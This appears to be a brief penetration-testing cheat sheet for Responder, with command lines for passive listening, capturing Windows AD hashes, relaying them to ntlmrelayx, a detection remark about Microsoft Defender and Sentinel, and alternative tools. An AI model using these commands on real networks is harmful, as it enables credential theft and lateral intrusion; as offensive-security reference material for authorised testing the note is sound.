responder

• network sniffing and hash capturing for windows AD

installation

usage

passive listening

$ responder -I eth1 -A

capturing hashes

• will be detected my microsoft defender and Sentinel (2022/Q4)

$ responder -I eth1 -w -d

newer version:

$ python Responder.py -I tun0 -rdw

• how to crack hashes: crack captured responder hashes

forwarding to ntlmrelayx

• disable SMB/HTTP in config
• with responder]

alternatives

• pretender
• inveigh